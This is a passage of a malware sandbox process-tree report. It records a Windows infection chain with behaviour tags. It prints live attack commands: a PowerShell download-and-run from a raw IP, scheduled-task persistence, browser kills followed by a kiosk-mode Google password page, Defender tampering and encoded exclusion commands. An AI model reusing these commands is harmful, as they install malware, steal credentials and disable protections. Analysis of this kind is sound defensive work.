                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:4464
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1456
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453880101\c48d7ad7ca.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453880101\c48d7ad7ca.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:4920
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c schtasks /create /tn f1kvDmaiSyf /tr "mshta C:\Users\Admin\AppData\Local\Temp\6USQMgDD8.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4024
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /create /tn f1kvDmaiSyf /tr "mshta C:\Users\Admin\AppData\Local\Temp\6USQMgDD8.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                            8⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:684
                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                          mshta C:\Users\Admin\AppData\Local\Temp\6USQMgDD8.hta
                                                                                                                                          7⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:3028
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                            8⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2832
                                                                                                                                            • C:\Users\Admin\AppData\Local\TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE
                                                                                                                                              "C:\Users\Admin\AppData\Local\TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE"
                                                                                                                                              9⤵
                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:4988
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453890101\9b14f9cb38.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453890101\9b14f9cb38.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:4232
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453900101\3f2e1d5910.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453900101\3f2e1d5910.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:2304
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10453900101\3f2e1d5910.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:5260
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453910101\3c45e50620.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453910101\3c45e50620.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:4608
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10453910101\3c45e50620.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4536
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453920101\a8afec1b66.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453920101\a8afec1b66.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:6980
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453930101\eb5f738682.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453930101\eb5f738682.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4204
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10453940101\92286f2337.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10453940101\92286f2337.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:1864
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM firefox.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:5144
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM chrome.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:6296
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM msedge.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:4040
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM opera.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:6648
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM brave.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:6660
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                          7⤵
                                                                                                                                            PID:6780
                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                              8⤵
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:1096
                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1992 -prefsLen 27099 -prefMapHandle 1996 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {057c216b-2b31-43de-8c9c-5c4810e5cca0} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                9⤵
                                                                                                                                                  PID:4900
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2464 -prefsLen 27135 -prefMapHandle 2468 -prefMapSize 270279 -ipcHandle 2476 -initialChannelId {055034e5-f9b4-471c-90d1-a5fabdb26df6} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6824
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3796 -prefsLen 25164 -prefMapHandle 3800 -prefMapSize 270279 -jsInitHandle 3804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3812 -initialChannelId {3879ec5e-5d7b-495e-8973-bb42715b2b61} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                    9⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:1588
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3956 -prefsLen 27276 -prefMapHandle 3960 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {04a9c26d-7a44-40fd-858c-8ca8b575fba7} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                    9⤵
                                                                                                                                                      PID:4700
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1644 -prefsLen 34775 -prefMapHandle 2840 -prefMapSize 270279 -jsInitHandle 3240 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3192 -initialChannelId {145a3876-c9dd-4a1e-9187-eb414c09aff4} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:5552
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5068 -prefsLen 35012 -prefMapHandle 5072 -prefMapSize 270279 -ipcHandle 5080 -initialChannelId {7ee60587-b736-4df3-b5a9-73f39cd700ce} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:4512
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5248 -prefsLen 32900 -prefMapHandle 5252 -prefMapSize 270279 -jsInitHandle 5256 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5264 -initialChannelId {73621480-8303-43ff-b8be-899fc8b5f8bf} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:2956
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5456 -prefsLen 32952 -prefMapHandle 5460 -prefMapSize 270279 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5472 -initialChannelId {374fa1a3-65f1-439f-8478-4c2da8260b0f} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:5788
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5656 -prefsLen 32952 -prefMapHandle 5660 -prefMapSize 270279 -jsInitHandle 5664 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5476 -initialChannelId {d91ebac0-15ea-4464-9ce1-11a9f3c4bbff} -parentPid 1096 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1096" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:2260
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10453950101\26e3163963.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10453950101\26e3163963.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                • Modifies Windows Defender TamperProtection settings
                                                                                                                                                • Modifies Windows Defender notification settings
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Windows security modification
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2480
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:6808
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3028
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:5736
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\93Q6JeiQLY.exe" h
                                                                                                                                                      9⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:2140
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\br30yxxIPR.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\br30yxxIPR.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5924
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3336
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:5256
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:6252
                                                                                                                                                • C:\Drivers\pcidrv.exe
                                                                                                                                                  C:\Drivers\pcidrv.exe
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5116
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe
                                                                                                                                                  7⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6168
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    timeout /t 2
                                                                                                                                                    8⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:6660
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10453980101\e187e4bdb4.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10453980101\e187e4bdb4.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:6816
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:7092
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:4552
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                                                                                                                                                        7⤵
                                                                                                                                                          PID:18076
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:17496
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10454010101\qhjMWht.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10454010101\qhjMWht.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:27704
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10454020101\9sWdA2p.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10454020101\9sWdA2p.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:37380
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10454030101\TbV75ZR.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10454030101\TbV75ZR.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:4968
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:27840
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10454040101\UZPt0hR.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10454040101\UZPt0hR.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:36480
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAGQALQBtAHAAUAByAGUAZgBlAFIARQBuAEMARQAgAC0AZQB4AGMAbABVAHMASQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0AZgBvAFIAYwBFADsAIABhAEQAZAAtAG0AUABwAFIARQBmAGUAcgBlAE4AYwBFACAALQBlAFgAYwBsAFUAcwBJAE8AbgBwAFIAbwBDAGUAUwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBGAG8AcgBjAEUA
                                                                                                                                                          1⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:6108
                                                                                                                                                        • C:\Program Files\Mesh Agent\MeshAgent.exe
                                                                                                                                                          "C:\Program Files\Mesh Agent\MeshAgent.exe"
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          PID:2160
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -noprofile -nologo -command -
                                                                                                                                                            2⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5636
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -noprofile -nologo -command -
                                                                                                                                                            2⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:2416
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:5316
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:6772
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2244
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4224
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:1484
                                                                                                                                                            • C:\Program Files\Mesh Agent\MeshAgent.exe
                                                                                                                                                              "C:\Program Files\Mesh Agent\MeshAgent.exe"
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              PID:1692
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -noprofile -nologo -command -
                                                                                                                                                                2⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:1436
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -noprofile -nologo -command -
                                                                                                                                                                2⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:2272
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:756
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4624
